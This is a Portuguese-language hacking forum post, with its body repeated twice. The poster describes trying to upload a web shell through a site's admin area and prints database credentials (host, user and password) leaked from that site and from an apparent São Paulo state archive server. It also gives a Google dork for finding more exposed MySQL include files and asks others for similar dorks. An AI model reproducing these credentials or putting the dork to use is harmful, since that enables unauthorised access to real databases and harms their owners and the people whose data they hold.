Tweet
Olha so que engraçado, estava mexendo em um site tentando upa a shell pela area admin, o site era este:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Apos o acesso achei esse link:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Que da pra le a conexão do banco de dados pelo propio navegador, aki:
//$conexao = mysql_connect("localhost", "root", "");
//mysql_select_db ("redeunimaco");
$conexao = mysql_connect("cpmy0012.servidorwebfacil.com", "unimaco_unimaco", "u1n2i3m4");mysql_select_db ("unimaco_unimaco");
Então pensei um pouco e criei essa dork:
allinurl:/conecta_mysql.inc
Achei tais site:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Esse é interessante:
$servidor="sql.arquivoestado.sp.gov.br";
$usuario_bd="db_arqestado";
$senha_bd="arq382edo";
$banco="db_arqestado";
$con=mysql_connect($servidor, $usuario_bd, $senha_bd);
mysql_select_db($banco);
È isso ai se alguem tiver umas dicas ai pra achar mais tipos de sites por arquivos sensiveis, so falar.
O participem ai Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... EBR *-*
Flw abraço a todos.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Apos o acesso achei esse link:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Que da pra le a conexão do banco de dados pelo propio navegador, aki:
//$conexao = mysql_connect("localhost", "root", "");
//mysql_select_db ("redeunimaco");
$conexao = mysql_connect("cpmy0012.servidorwebfacil.com", "unimaco_unimaco", "u1n2i3m4");mysql_select_db ("unimaco_unimaco");
Então pensei um pouco e criei essa dork:
allinurl:/conecta_mysql.inc
Achei tais site:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .
Esse é interessante:
$servidor="sql.arquivoestado.sp.gov.br";
$usuario_bd="db_arqestado";
$senha_bd="arq382edo";
$banco="db_arqestado";
$con=mysql_connect($servidor, $usuario_bd, $senha_bd);
mysql_select_db($banco);
È isso ai se alguem tiver umas dicas ai pra achar mais tipos de sites por arquivos sensiveis, so falar.
O participem ai Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... EBR *-*
Flw abraço a todos.
Comment